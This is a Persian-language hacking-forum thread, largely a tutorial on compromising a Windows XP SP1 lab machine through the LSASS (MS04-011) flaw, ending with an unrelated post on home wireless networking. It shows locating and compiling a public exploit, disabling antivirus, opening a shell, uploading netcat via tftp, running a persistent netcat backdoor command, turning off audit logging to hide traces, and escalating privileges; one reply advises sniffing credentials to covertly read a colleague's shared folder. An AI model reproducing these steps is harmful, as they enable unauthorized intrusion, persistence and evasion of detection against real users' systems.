حالا علاوه بر BugID ، يك ديكشنري از آسيب پذيري هاي شناخته شده ي عمومي وجود داره كه به اون Common Vulnerability and Exposures يا CVE‌ مي گند . هر آسيب پذيري بر اساس سال كشف و گزارش داده شدن و چندمين آسيب پذيري در اون سال بودن ، يك شماره شناسايي منحصر به فرد ميگيره كه به شكل مثلاً CVE-2007-6303 نشون داده ميشه . اسكنري مثل Nessus‌ اين شماره رو هم در اختيار ميذاره كه با استفاده از اون هم ميشه به همون اطلاعات بالا دسترسي پيدا كرد . در سايت SecurityFocus با رفتن به لينك http://www.securityfocus.com/vulnerabilities (http://www.securityfocus.com/vulnerabilities) امكان جستجو بر اساس CVE ميسر هست . همينطور با قرار دادن شماره BugID در انتهاي اين لينك http://www.securityfocus.com/bid/ (http://www.securityfocus.com/bid/) به اطلاعات مورد نظر رسيد . مثلاً براي پيدا كردن اطلاعات باگ شماره 26832 ، از لينك زير استفاده ميكنيم :
http://www.securityfocus.com/bid/26832 (http://www.securityfocus.com/bid/26832)

اما بعد از رفتن به صفحه ي مربوط به باگ مورد نظر در اين سايت ، لينك exploit بسيار مورد استفاده قرار ميگيره . http://www.securityfocus.com/bid/26832/exploit (http://www.securityfocus.com/bid/26832/exploit) .

در اين صفحه ، اگر براي اون باگ خاص در ديتابيس SecurityFocus ، اطلاعات يا كد خاصي باشه ، ارائه ميشه . نبودن اكسپلويت در اين سايت ، به معني نبودن اكسپلويت در مورد اون باگ به طور كل ، نيست .
اما اكسپلويت هايي كه در اين سايت قرار ميگيره ، تا اونجا كه من ديدم ، شامل چند نوع اكسپلويت ميشه كه به شرح ذيل هستند :

1)گروهي از اين اكسپلويت ها احتياج به كد خاصي ندارند و از طريق URL يا دستورالعملهاي خاصي قابل اجرا هستند . معمولاً روش استفاده از اونها در خود صفحه ي مورد نظر توضيح داده شده .

2)گروهي ديگه فايل هايي هستند كه پسوند c يا cpp دارند . اين اكسپلويت ها كد هايي هستند كه به زبان C يا C پلاس پلاس نوشته شدند و بايد قبل از اجرا ، بر اساس سيستم عاملي كه در براي اون نوشته شدند ، كامپايل بشن . اين نوع اكسپلويت ها سه دسته هستند . يك دسته اونهايي كه براي اجرا بر روي ويندوز نوشته شدند . اين گروه از هدرهاي مخصوص ويندوز مثل windows.h يا winsock.h يا winsock2.h استفاده ميكنند . گروه دوم كدهايي هستند كه براي استفاده در لينوكس نوشته شدند . اين كدها علاوه بر اينكه هدرهاي ويندوز رو ندارند ، از هدرهايي مثلsys/socket.h یا sys/types.h استفاده مي كنند . گروه سوم هم اكسپلويت هايي هستند كه براي هر دو محيط ويندوز و لينوكس نوشته شدند و هر دو سري از هدر ها رودارند و فرق نميكنه كه در ويندوز كامپايل بشن يا در لينوكس . اكسپلويت هاي ويندوزي رو با VC++6 و لينوكسي رو با gcc ميشه كامپايل كرد . نكته اي كه اينجا وجود داره اين هست كه معمولاً اين كدها در هنگام كامپايل يك سري خطا ميدن كه بايد اين خطاها رو رفع كنيد . عمده ترين خطاها مربوط به پيدا نكردن يك هدر خاص ، يا جا افتادن يك سمي كالن ، و يا تغيير علامت كوتيشن در انتهاي رشته ها بر اثر استفاده از يونيكدهاي مختلف در سيستم هاي مختلف هست .


3)گروه ديگه اكسپلويت هاي هستند كه پسوند pm دارند . اين اكسپلويتها ماژولهاي پرل هستند كه در MetaSploit قابل استفاده هستند . كافيه كه اونها رو به فولدر مربوط به اكسپلويت ها در MetaSploit كپي كنيد و در شرايطي كه هنگام load شدن با خطا مواجه شديد ؛ با توجه به پيغام خطا ، كافيه كه يك يا دو خط در سورس اكسپلويت تغيير ايجاد كنيد تا مشكل حل بشه .

4) گروه ديگه از اكسپلويت ها پسوند pl دارند . اينها اسكريپت هاي perl هستند . براي اجراي اونها در ويندوز از نرم افزار ActivePerl استفاده ميشه و لينوكس هم كامپايلر اون رو داره . خطاهاي اين اسكريپت ها هم بايد با توجه به پيغام خطا مرتفع بشه .


5)دسته ي ديگه از اكسپلويت ها ، پسوند py دارند كه اسكريپت هاي پيتون هستند كه مفسر اونها براي ويندوز و لينوكس موجود و قابل نصب هست .

6) گروه دیگه به صورت كدهای html هستند كه باید طبق دستور نویسنده از اونها استفاده كرد .

7)گروه آخر هم فايلهاي باينري هستند كه به طور مستقيم از ويندوز قابل اجرا هستند .

معمولاً همه ی این اكسپلویتها حاوی توضیحات برای نحوه ی صحیح استفاده و آسیب پذیری كه برای اون ها چك شده هستند , می باشند .


اگر دقت كرده باشيد ، متوجه ميشيد كه سايت SecurityFocus ، يك سايت امنيتي هست و به صورت خاص روي اكسپلويت ها فعاليت نمي كنه . سايت PacketStormSecurity.nl هم همينطور هست .اما سايت milw0rm.com به صورت تخصصي روي هك و اكسپلويت ها كار ميكنه .

اگرچه اكسپلويت مفهوم وسيعي داره ، اما از ديدگاه كدها ، دو جور اكسپلويت داريم . اكسپلويت هاي remote و local اكسپلويت هاي ریموت براي نفوذ بدون دسترسي هست ، يعني در شرايطي كه ما هيچ گونه دسترسي ، چه فيزيكي و چه راه دور به سيستم نداريم و تازه قصد داريم كه دسترسي بگيريم . اما اكسپلويت هاي لوكال براي زماني هست كه ما روي سيستم دسترسي داريم و حالا قصد داريم كه دسترسي خودمون رو به سطح بالاتري از مديريت برسونيم .

البته شما نباید اكسپلویت های مخصوص web application رو با این نوع اكسپلویت هایی كه در بالا در موردشون صحبت شد , یكی بدونید .برنامه های كاربردی تحت web داستانش متفاوت از سیستم عامل و سرویسهای اون هست . اگر چه خود web server به عنوان سرویس سیستم عامل مطرح میشه . بنابرین در مورد حملات تحت وب , در انجمن مربوط به خودش صحبت می كنیم .

یكی دیگه از مسائلی كه قبل از نفوذ مهم هست , آماده داشتن ابزارهایی هست كه مورد نیاز هست . این به معنی این هست كه قبل از شروع به نفوذ , باید بدونیم كه چه جوری میخوایم دسترسی بگیریم و بعد از دسترسی قصد داریم چه كار كنیم . بر همین اساس تمام ابزارهای مورد نیازمون باید دم دست باشن , تا كار سریع و درست انجام بشه. این كار احتیاج به تمرین و تجربه داره كه كم كم به دست میاد .

pastoo
31-01-2008, 19:10
بحث در مورد گرفتن دسترسي روي هدف رو ، همونطور كه قول داده بودم ، به صورت كاربردي روي يك سيستم Windows XP SP1 شروع مي كنم .

محيط ما ، يك محيط آزمايشگاهي هست ، و من دقيقاً در مورد سيستم هدفم ، اطلاعات دارم ، بنابرين مستقيم ميرم سراغ اسكن كردن هدف . البته اينجا اسكن كردن رو فقط براي تمرين و دادن كمي توضيح در مورد گزارشات Nessus انجام ميديم ، وگرنه در حالت واقعي تر ، اگر بدونيم كه هدفمون XP SP1 هست ، با metasploit‌ به راحتي دسترسي ميگيريم .
من يك قسمت از گزارش ارائه شده توسط Nessus رو كه قصد داريم روي اون كار كنيم رو جدا كردم كه در زير مي بينيد .






microsoft-ds (445/tcp)


Synopsis :

Arbitrary code can be executed on the remote host due to a flaw in the
LSASS service.


Description :

The remote version of Windows contains a flaw in the function
DsRolerUpgradeDownlevelServer of the Local Security Authority
Server Service (LSASS) which may allow an attacker to execute
arbitrary code on the remote host with the SYSTEM privileges.

A series of worms (Sasser) are known to exploit this vulnerability
in the wild.


Solution:

Microsoft has released a set of patches for Windows NT, 2000, XP and 2003 :

http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx


Risk Factor :

Critical / CVSS Base Score : 10
(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N)
CVE : CVE-2003-0533
BID : 10108
Other references : IAVA:2004-A-0006, OSVDB:5248
Plugin ID : 12209




همونطور كه مشخص هست ، اين باگ معروف LSASS هست كه روي سرويس NetBIOS Over TCP مايكروسافت ،روي پورت 445 وجود داره . اين گزارش ميگه كه توسط اين باگ ميشه يك كد رو از راه دور روي سيستم قرباني اجرا كرد و دسترسي SYSTEM گرفت .

همين جا من يك نكته ي امنيتي خيلي ريز و خيلي خيلي مهم رو بگم كه اگر شما اون رو رعايت كنيد ، تقريباً 99 درصد از اكسپلويت هايي كه از باگهاي سيستم عامل و سرويس هاي اون ، مثل اين باگ ، و باگهايي كه هنوز كشف نشده ، استفاده ميكنند ، در گرفتن دسترسي روي سيستم هدف شكست ميخورند . ( قابل توجه worm نويسها كه از اين باگها براي طراحي worm‌ استفاده مي كنند )
در مقاله اي كه در مورد ايمن كردن ويندوزهاي سرور در همين سايت ارائه شده ، به حدود 20 تا فايل اجرايي مهم اشاره شده كه بايد دسترسي اجرا رو به اونها ، فقط و فقط به administrator داد . اين فايلها به طور پيش فرض ، دسترسي براي اكانت system‌ هم دارند كه بايد حذف بشه . يكي از اين فايلهاي مهم ، cmd.exe هست . اين اكسپلويت ها از شل كد استفاده مي كنند و همونطور كه در درسهاي شل كد نويسي اشاره كرديم ، شل كد بايد در انتها فايل cmd.exe رو اجرا و اون رو روي پورتي كه باز كرده bind كنه ، و چون اكثر سرويسها در ويندوز با اكانت SYSTEM‌ اجرا ميشن ، شل كد نمي تونه فايل cmd.exe رو كه اين اكانت به اون دسترسي نداره رو اجرا كنه و نهايتاً باعث ميشه كه اكسپلويت fail بشه . به همين راحتي با يك permission بندي درست ، سيستم شما تا حد خيلي زيادي safe‌ ميشه .

خب ، برگرديم به تحليل گزارش . چيزي كه براي ما مهم هست ، بخش انتهايي گزارش هست كه Risk Factor‌ رو توضيح داده . اين باگ از نوع بحراني تشخيص داده شده و بر اساس استاندارد امتياز دهي به باگهاي امنيتي (CVSS) ، امتياز 10 رو گرفته . حروف مخففي هم كه در زير اين امتياز دهي در داخل پرانتز نوشته شده ، مربوط به همين سيستم امتياز دهي هست كه جزييات و معاني اون ها رو ميتونيد در آدرس http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 (http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2) ببينيد . ما اينجا به شماره CVE‌ يا BID كه همون bugID هست ، احتياج داريم . به وسيله ي يكي از اين 2 آيتم ، به آدرس http://www.securityfocus.com/bid/10108 (http://www.securityfocus.com/bid/10108) ميريم و وارد صفحه ي مربوط exploit ميشيم . همونطور كه مي بينيد ، ما اينجا 4 تا اكسپلويت داريم كه 3 تاي اونها كدهاي C هستند و آخري ماژول پرل براي metasploit . معمولاً در چنين شرايطي ، من اكسپلويت مربوط به metasploit‌ رو انتخاب مي كنم ، اما اينجا ، براي اينكه كدهاي C عموميت بيشتري دارند ، اكسپلويت ديگه اي رو انتخاب مي كنيم .
اكسپلويت HOD-ms04011-lsasrv-expl.c انتخاب مي كنيم . با كليك روي لينك اون ، كد نمايش داده ميشه . توضيحات كد و نحوه ي استفاده از اون كاملاً مناسب به نظر ميرسه ، ضمن اينكه نويسنده اظهار كرده كه روي هدف مورد نظر ما هم اون رو تست كرده . بنابرين VS C++ 6 رو اجرا ميكنيم ، يك فايل سورس C جديد باز مي كنيم و محتواي اكسپلويت رو copy & paste مي كنيم داخل فايل جديد . از منوي Build ، گزينه Compile رو انتخاب مي كنيم و فايل رو با يك اسم ، مثلاً hod.c ذخيره مي كنيم . در سيستم ما ، عمل كامپايل بدون خطا و با 5 اخطار (Warning) انجام شد كه اخطار ها قابل اغماض هستند ، مگر اينكه در هنگام ساخت فايل اجرايي باعث مشكل بشن . بنابرين از منوي build گزينه build رو انتخاب مي كنيم تا فايل اجرايي با اسم hod.exe ساخته بشه . فايل بدون مشكل ساخته ميشه . فقط بايد دقت كنيد كه آنتي ويروس ما به محض ساخته شدن فايل اجرايي ، اون رو ويروس تشخيص داد و حذفش كرد ، بنابرين بايد Auto – Protect آنتي ويروس رو غير فعال كنيد .
حالا اكسپلويت رو اجرا مي كنيم . شكل زير رو ببينيد .



http://www.imenafza.net/pics/cmd2.JPG


اين اكسپلويت ، يك اكسپلويت جالب هست . همونطور كه در Usage و توضيحات اون اومده ، ميشه اون رو به دو شكل مستقيم و معكوس استفاده كرد . براي جلسه ي اول ، ما از روش مستقيم استفاده كرديم . در شكل بالا ، طبق توضيح نويسنده ي كد ، ما از عدد صفر براي Targets كه xp هست استفاده كرديم . آدرس ip هدف يا قرباني هم 192.168.0.10 هست و پورتي كه مي خوايم روي سيستم هدف باز بشه و از طريق اون شل بگيريم هم 4444 انتخاب كرديم . اگر حمله بدون مشكل انجام بشه ، خروجي اكسپلويت به شكل بالا خواهد بود و تا گرفتن دسترسي به همون شكل باقي ميمونه ( كنترل به سيستم عامل بر نمي گرده )
در اين حالت ، ما يك ترمينال ديگه باز مي كنيم و با استفاده از netcat ، روي پورت 4444 به سيستم هدف وصل شده و شل مي گيريم . بعد از گرفتن شل ، مسئله ي اصلي اين هست كه قصد داريم چه كاري انجام بديم . چون در اين سري از مقالات قصد ما آموزش هست ، بنابرين تمام كارهايي كه به ذهنمون ميرسه يا بلد هستيم رو انجام ميديم ، اما در حالت واقعي ، بايد يك مسير درست و منطبق با شرايط رو انتخاب كرد .

خيلي از مسيرها ، براي انجام ، احتياج به اين داره كه ما بتونيم روي سيستم هدف فايل upload يا از روي اون download كنيم . براي همين بايد اول بفهميم كه چطور بايد اين كار رو انجام بديم . در اين جلسه ما آسون ترين راه روي سيستم هاي ويندوز ، يعني استفاده از tftp رو بررسي مي كنيم و در درسهاي بعد ، روشهاي ديگه رو كار مي كنيم .

براي انجام اين كار ابتدا بايد يك tftp‌ سرور روي سيستم خودمون اجرا كنيم . ما از TFTPD32.EXE استفاده كرديم . بعد از اجرا ، بايد security اون رو روي none تنظيم كنيم.
بهتره فايلي رو هم كه ميخوايم uoload كنيم ، در همون فولدري باشه كه tftpd32.exe رو از اونجا اجرا كرديم .
استفاده از tftp.exe ، در سه صورت با شكست مواجه ميشه . اول اين كه مجوز اجرا براي اين فايل ، مثل cmd.exe ، فقط براي administrator تنظيم شده باشه . ما هنوز دسترسي در حد SYSTEM داريم . دوم اين فايل ، اصلاً روي سيستم هدف وجود نداشته باشه و سوم اينكه يك فايرول ، ارتباط روي پورت 69 udp رو ********** كنه .
حالا با فرض اين كه هيچ مشكلي وجود نداره ، مطابق شكل زير ، فايل nc.exe رو روي سيستم قرباني upload مي كنيم . نكته اي كه وجود داره اينه كه بايد nc.exe رو قبل از ارسال rename كنيم ، طوري كه تابلو نباشه . كه البته در اينجا براي ساده بودن ، اين كارو نكرديم .



http://www.imenafza.net/pics/cmd1.JPG


بعد از ارسال nc.exe روي سيستم هدف ، بايد اون رو به صورت backdoor اجرا كنيم . در اين مورد به اندازه ي كافي مقاله آموزشي به زبان فارسي وجود داره و احتياج به توضيح نداره ، فقط من 2 تا نكته كه در جايي نديدم به اون اشاره بشه و خيلي مهم هم هست رو توضيح ميدم . تا اونجا كه من ديدم ، همه ميگن كه netcat در حالت backdoor ، بايد به شكل زير اجرا بشه :



nc.exe -l -p 1234 –e cmd.exe


اين حالت اجرا ، اگرچه كه يك backdoor روي پورت 1234 tcp روي هدف ايجاد ميكنه ، اما 2 تا ايراد بزرگ داره .
اونايي كه دوست دارند مطالب رو عمقي و كاربردي تر ياد بگيرند ، چند روزي فرصت دارند تا در اين مورد فكر كنند و بگن كه اين backdoor چه ايرادهايي داره

pastoo
19-02-2008, 23:16
در قسمت اول جاهایی را به اشتباه توضیح دادم که در اینجا اصلاح میکنم . ( دوستان که مطالب را دنبال نمیکنن )

netcat‌ در ويندوز ، 2 تا option اضافي نسبت به لينوكس داره . يكي سوييچ d و يكي هم سوييچ L هستش . وقتي netcat در حالت backdoor در استارت آپ يا رجيستري قرار ميگيره ، وقتي سيستم بالا مياد و ميخواد netcat رو اجرا كنه ، پنجره ي command prompt ويندوز باز ميشه . حالا اگر سوييچ d استفاده نشه ، اين پنجره به همين شكل باز باقي ميمونه و title پنجره ، كاملاً نشون ميده كه netcat به حالت backdoor اجرا شده و اين خيلي تابلو و اشتباه مبتديانه اي هست . اما اگر سوييچ d رو به كار ببريم ، پنجره ي مورد بحث ، يك لحظه ي كوچيك باز ميشه و بلافاصله بسته ميشه و اين حالت نسبت به حالت قبلي بسيار مخفي تر هست . اين سوييچ تاثيري در موقعي كه backdoor رو از روي شل اجرا ميكنيم نداره . اما بهتره كه عادت كنيم هميشه ازش استفاده كنيم .

سوييچ بعدي كه مي بايست استفاده كنيم ، L به جاي l هستش . اين سوييچ باعث ميشه كه اگر به هر دليل ، سوكت ايجاد شده توسط backdoor بسته شد ، netcat به صورت اتوماتيك ، دوباره سوكت رو باز كنه . اين مورد خيلي به درد بخور هست ، مخصوصاً وقتي كه ما به صورت اشتباهي ، خط فرمان ارتباطي خودمون با backdoor رو ، روي سيستم خودمون مي بنديم .

پس بهتره كه netcat رو در حالت backdoor به اين شكل اجرا كنيم :



nc.exe –L –p 1234 –e cmd.exe –d

خب ، قبل از ادامه ي بحث در مورد هدفمون ، به يك روش ديگه براي گذاشتن يا برداشتن فايل روي سيستم هدف ، در سيستم هاي ويندوزي اشاره ميكنم . در اين روش از netbios و share براي انجام اين كار استفاده ميكنيم . البته اين روش ممكنه هميشه جوابگو نباشه . اما در صورتي كه استفاده از tftp‌ به هر دليل مقدور نباشه ، ميشه روي اين روش كار كرد . اين روش در حقيقت بازي كردن با دستورات net در ويندوز هست . چون دوست عزيز و استاد گرامي آقاي دكتر آراز صمدي ، حدود 4 سال پيش يك سري مقاله تحت عنوان ضروريات ويندوز سرور براي هکرها در اينترنت منتشر كردند و فكر ميكنم كه هنوز هم قابل دسترس باشه ، ديگه ضرورتي براي توضيح اين دستورات نمي دونم و فكر ميكنم كه همه با اين دستورات آشنا هستند . در اين روش ، كه اون رو بارها تست كردم ، شما ابتدا يك فولدر روي سيستم خودتوون share مي كنيد و فايلهايي كه قصد داريد رويه سيستم هدف قرار بديد رو در اون فولدر ميذاريد . بعد با استفاده از دستورات net use و net view ، از روي شل سيستم قرباني ، فولدر share‌ شده در سيستم خودتون رو به صورت يك درايو مجازي به درايوهاي سيستم هدف اضافه مي كنيد . و بعد با دستور copy اون فايلها رو از درايو ايجاد شده به سيستم هدف منتقل مي كنيم . همين كار رو براي برداشتن فايل از سيستم هدف هم ميشه انجام داد .
اين روش در زماني كه فايل net.exe فقط دسترسي اجرا براي administrator رو داشته باشه ، قابل استفاده نيست . همينطور وقتي كه ما از يك bug مربوط به netbios ، مثل همين باگ مطرح شده ، براي نفوذ به سيستم استفاده مي كنيم .

خب ، برگرديم به ادامه ي بحث خودمون . وضعيت خودمون رو بررسي مي كنيم :

1 – يك دسترسي با مجوز SYSTEM روي هدف داريم .
2 – مي تونيم فايل روي سيستم هدف up يا down كنيم .
3 – netcat رو روي سيستم up و به صورت backdoor اجرا كرديم و يك دسترسي ديگه هم روي سيستم هدف داريم .

از اينجا به بعد ، ديگه هر شخصي مسير خودش رو دنبال ميكنه . اما به طور كل ، اگر هدف ما داشتن يك دسترسي دائم روي سيستم هدف هست ، بايد بتونيم يك backdoor دائم روي سيستم ايجاد كنيم . ضمن اينكه بايد حواسمون به ردپا هامون هم باشه . براي شروع ، اول فايل auditpol.exe‌ رو روي سيستم قرباني up مي كنيم و اون رو به صورت auditpol /disable اجرا مي كنيم . اين كار باعث ميشه audit policy روي سيستم قرباني غير فعال بشه . حالا خيالمون راحته كه از اينجا به بعد ، فعاليت هاي ما ثبت نميشه . اما يك نكته هم اينجا وجود داره .

نمي دونم كدوم يكي از دوستان ، چندوقت پيش به صورت خصوصي ، سوالي در مورد سيستمهاي ضد اطلاعاتي پرسيده بود . در ضد اطلاعات ، كار بايد به مخفيانه ترين روش انجام بشه . فرق اطلاعات با ضد اطلاعات اينه كه اطلاعاتي ، اطلاعات رو از افراد معمولي بدست مياره ، اما ضد اطلاعاتي ، اطلاعات رو از اطلاعاتي بدست مياره ، و اين خيلي فرق داره . افراد عادي معمولاً نسبت به پيرامونشون كم توجه هستند و نكته ها براشون مهم نيست ، اما اطلاعاتي ها كاملاً هشيار هستند . بنابرين وقتي يك برنامه ضد اطلاعاتي قرار هست كه انجام بشه ، بايد خيلي دقيق و حرفه اي انجام بشه . به همين علت ، مثلاً وقتي قرار هست كه محيط يك اطلاعاتي مورد تجسس قرار بگيره ، اين كار بايد توسط حداقل دو نفر انجام بشه . يكي از اين دو نفر ، تجسس ميكنه و نفر دوم ، تمام چيزهايي رو كه نفر اول مورد تجسس قرار ميده يادداشت ميكنه . اين كار براي اين هست كه هنگام ترك كردن موقعيت ، تمام وسايل بررسي شده ، دوباره به همون شكل اول سرجاشون قرار بگيرند . چون يك شخص اطلاعاتي به راحتي ميتونه متوجه تغييرات بشه .

خب ، اين موضوع رو مطرح كردم كه بگم ، اگر Audit Policy غيرفعال بشه ، امكان اينكه در بررسي هاي امنيتي متوجه اون بشن ، خيلي زياد هست . بنابرين خوبه كه هر وقت خواستيم ارتباط رو قطع كنيم ، اون رو enable كنيم . حتي ميتونيم مشخص كنيم كه مثلاً 5 دقيقه بعد از خروج ما ، اين عمل انجام بشه .

قدم بعد ميتونه ثبت backdoor در رجيستري ويندوز يا تهيه يك batch file‌ و قرار دادن اون در Start Up باشه . در هر دو صورت ، بهتره كه يك batch file براي اجراي backdoor تهيه بشه و بعد اين batch file با برنامه هاي bat2com يا bat2exe تبديل به يك فايل اجرايي بشه . اسم اين فايل هم كاملاً شبيه فايلهاي سيستمي ويندوز انتخاب بشه . اون وقت اين فايل رو با استفاده از دستور reg ، از خط فرمان در رجيستري ثبت كرد يا در start up قرار داد .
يكي ديگه از راه هاي متداول براي حفظ دسترسي ، ايجاد يك حساب كاربري و انتقال اون به گروه ادمين ها هست . اين كار هم با دستورات net قابل اجرا هست كه چون در مقالات آقاي دكتر صمدي موجود هست ، ديگه به اون نمي پردازم .

در مقالات بعد ، انشاء الله مطالب بيشتري رو در اين زمينه بررسي خواهيم كرد .

pastoo
16-09-2008, 21:22
خیلی موقع ها پیش میاد برای شما که ممکنه بخواهین سطح دسترسی اکانت خودتون رو داخل سیستم عامل ویندوز افزایش بدین .
همونطور که میدونین داخل ویندوز های NT Based از جمله 2000 - 2003 - XP دو نوع سطح دسترسی وجو داره که یکیش سطح Administrator هست یعنی مدیر سیستم که به تمامی resource ها دسترسی داره و میتونه سیستم رو مدیریت کنه و یکی دیگه از نوع دسترسی ها نوع دسترسی Limit هست که همونطور که از اسمش پیداست کاربرانی که از این نوع تعریف میشن " محدود " هستن و برای انجام خیلی از کارها قابلیتهای انجام اون کار رو ندارن و در واقع privilege اون اکانت در سطح پائین و limit قرار داره .
ولی بعضی اوقات و به خاطر برخی از دلایل شما مجبور میشین سطح دسترسی خودتون رو افزایش بدین ( قانونی و یا غیر قانونی . این بستگی به شما داره ! ) .
همونطور که میدونین دسته ای از آسیب پذیری ها وجود دارن که از اونها با نام Privilege Escalation نام برده میشن که به دلیل وجود آسیب پذیری در یک سرویس خاص ، قابلیت افزایش سطح دسترسی تا سطح administrator وجود داره .
اکثراً هم افزایش این privilege ها به صورت local صورت میگیره یعنی در واقع exploit اونها به صورت local نوشته میشه که بهشون میگن Local Escalation Of Privilege .
خیلی اوقات بسیاری از کدهای مخرب هم توی War Head برای Conquer کردن یک سیستم و نفوذ به یک سیستم بعد از اینکه War Head خودشون رو اجرا کردن که قاعدتاً یک Exploit از نوع 0day هست با یک آسیب پذیری 0day از نوع escalation سطح دسترسی خودشون رو به Admin میرسونن .
خوب ، بعضی اوقات پیش میاد که شما قابلیت Run کردن یک exploit از نوع privilege escalation رو روی سیستم خودتون ندارین و در واقع به هر نوعی شاید محدودیتی داشته باشین ، مثل اینکه نتونین Cmd رو اصلا باز کنین که بخواهین یک exploit رو پارامتر دهی کنین و از نوع طریق دسترسی بگیرین .
در همچین مواقعی که تقریباً میشه گفت تمام درها به روی شما بسته هست یک راه میمونه و اون هم استفاده از یک ابزار بسیار جالب هست که امروز به صورت کامل بررسیش کردم و روی سیستم خودم تست کردم و جواب گرفتم .
اسم این ابزار PC Login Now هست که به صورت یک Live CD لینوکس هست که به صورت یک image روی HD شما اجرا میشه و به شما اجازه میده که با انتخاب کردن ویندوز مورد نظر خودتون اکانتها رو بررسی کنین ، اونها رو Disable کنین ، lock کنین و مهم ترین و جالبترین هسمتش اینه که اجازه افزایش سطح دسترسی یک اکانت رو به شما میده و در واقع شما میتونین از پائین ترین سطح دسترسی ( به طور مثل : مهمان ) به بالاترین سطح دسترسی ( administrator ) روی ویندوز خودتون برسین .
و در واقع وظیفه Elevate کردن سطح دسترسی بیشتر رو به عهده میگیره .
خوب این مسئله برای خیلی ها میتونه حائز اهمیت باشه .
لینک دانلود این ابزار :
http://downloads.sourceforge.net/pcloginnow/PCLoginNow_Full_2.0.iso?use_mirror=nchc&filesize=57894912

نکاتی که برای استفاده از این ابزار باید در نظر داشته باشین و انجام بدین :

[ + ] اول اینکه ابتدا Image مورد نظر رو که دانلود کردین با یک ابزار Write مثل Nero روی یک cd رایت میکنین .
[ + ] سیستم خودتون رو Boot میکنین و CD رو داخل CD ROM قرار میدین و از قسمت تنظیمات مربوط به BIOS سیستم رو از روی CD Rom / DVD Rom بوت میکنین .
[ + ] CD شروع به Boot شدن میکنه و پس ازطی چند مرحله که به صورت Automatic انجام میشه میرسه به جائی که شما باید ویندوز مورد نظر خودتون رو که میخواهین توی قسمت تنظیمات Account ش دستکاری بکنین رو انتخاب کنین .
[ + ] مرحله بعدی میرسه به جایی که شما اکانت مورد نظر خودتون رو انتخاب میکنین و با توجه به ابزارهایی که دور و برش میبینین یه کارهای جالبی روش صورت میدین که دیگه من نمیگم که خودتون ببینین .
نهایتاً شما یک User در سطح Limit که کاملاً محدود هست رو میتونین تبدیل کنین به یک User که قابلیت مدیریت کل سیستم رو داره .

Siavosh1345
20-05-2009, 20:31
با سلام خدمت مدیران
من یک سوال دارم و هرچی گشتم جوابی پیدا نکردم اگر ممکنه راهنمائی نمائید.
میخوام بدونم در یک شبکه Domain وقتی از روی یک Client فولدری Share میشود اما شما Permisson ندارید چگونه بدون آنکه طرف متوجه بشه میتوان فولدر فوق را دید بدون آنکه دسترسی به PC فوق داشته باشید و یا بخواهید طرف را هک کنید.

pastoo
20-05-2009, 21:04
دوست عزیز امنیت کلی ویندوزهای سرور بالا هست و شما بدون هک کردن یوزر با دسترسی بالا نمیتوانید این کار را بکنید

Siavosh1345
20-05-2009, 22:11
با تشکر از مدیر محترم Pastoo
1) چنانچه دستگاه هدف هک شود و در زمان بررسی فولدر فوق آیا شخص مورد نظر متوجه کنجکاوی و بررسی PC خود میشود.
2) آیا مراحل هک بصورتی است که شما آموزش داده اید
3) آیا مراحل ساده تری وجود دارد زیرا من در این زمینه هیچگونه آشنائی ندارم
4) آیا امکان ردیابی IP شخصی که هک کننده است وجود دارد؟

pastoo
20-05-2009, 22:38
دوست من
منظور من از هک کردن locall این است که شما بتوانی user name , paswword کسانی که قادر به تغییر فایل و اکانت های مدیریتی دارند را پیدا کنی که برای این کار روش های زیادی موجود است که به نوع شبکه شما مربوطه
از 1 sniffer در شبکه برای به انتظار نشتن 1 یوزر استفاده کنید
این سایت مربوط به آموزش هک نمیباشد و بنده در این تایپیک روش های بسیاری که میتوان به عنوان 1 مرجع کامل از آن استفاده کرد

موفق باشید

pastoo
31-05-2010, 23:27
بسياري از کاربران دوست دارند که شبکه بي‌سيم منزل يا دفتر کارشان را خود را‌ه‌اندازي کنند. با اين شبکه، امکان به اشتراک گذاشتن فايل‌ها، چاپگرها و نيز دسترسي به اينترنت را بدون اتصال کابل به کامپيوترتان خواهيد داشت. اين قابليت مخصوصاً براي کامپيوترهايي که در جايي قرار دارند که وصل کردن کابل به آنها مشکل است و يا از آن مهمتر براي دسترسي به شبکه و اينترنت توسط نوت بوك‌ها که در هر جاي دلخواهي از خانه يا دفتر کار قابليت فعاليت داشته باشند، خيلي ايده‌آل است. در حاليکه شما نوت بوک را از اتاق خواب به اتاق پذيرايي مي‌بريد، همچنان اتصال به شبکه و اينترنت برقرار است.




البته در مورد نوت بوك‌هايي صحبت مي‌کنيم که داراي کارت شبکه بي‌سيم مي‌باشند. ( هرچند هر نوت بوکي که در 2 سال اخير ساخته شده باشد، حتماً اين قابليت را خواهد داشت. ) اگر شما از نوت بوک يا کامپيوتري استفاده مي‌کنيد که داراي اين قابليت نيست، ابتدا بايد به فکر خريد يک کارت شبکه بي‌سيم باشيد.
براي را‌ه‌اندازي يک شبکه بي‌سيم به موارد زير نياز داريد:

1 ـ يک اتصال اينترنتي با پهناي باند بالا ( مثل خطوط ADSL ) براي اشتراک اينترنت در شکبه
2 ـ يک کارت شبکه بي‌سيم به ازاي هر دستگاهي که تمايل به اتصال آن به شبکه بي‌سيم داريد.
3 ـ يک روتر بي‌سيم با پهناي باند بالا ( البته اختياري است )

معمولاً يک سخت‌افزار به نام "روتر بي‌سيم با پهناي باند بالا" يا "Access Point" براي را‌ه‌اندازي يک شبکه بي‌سيم مورد نياز است. در اين مقاله نحوه را‌ه‌اندازي يک شبکه بي‌سيم را بدون استفاده از اين وسيله نسبتاً گران قيمت آموزش خواهيم داد. هرچند برخلاف اين ضرب المثل شيرين فارسي که مي‌گويد: " هيچ بقالي نمي‌گويد که ماست من ترشه! " ابتدا به محدوديت هاي اين روش که ناشي از عدم استفاده از روتر مي‌باشد، اشاره مي‌کنم:

l کامپيوتري که داراي اتصال اينترنت با پهناي باند بالا مي‌باشد، بايد هميشه روشن باشد. اگر آن را خاموش کنيد، ارتباط به اينترنت کامپيوترهاي ديگر قطع مي‌شود، در حاليکه اگر از روتر بي‌سيم استفاده کنيد، اتصال اينترنت شما به روتر متصل شده و در نتيجه با خيال راحت مي‌توانيد تمام کامپيوترها را بدون قطع شدن اينترنت خاموش کنيد.

l امنيت شبکه شما کمتر خواهد بود، چرا که روترهاي با پهناي باند بالا داراي يک فايروال سخت‌افزاري داخلي هستند که شما با حذف اين روتر، در واقع آن فايروال را هم از دست داده‌ايد.

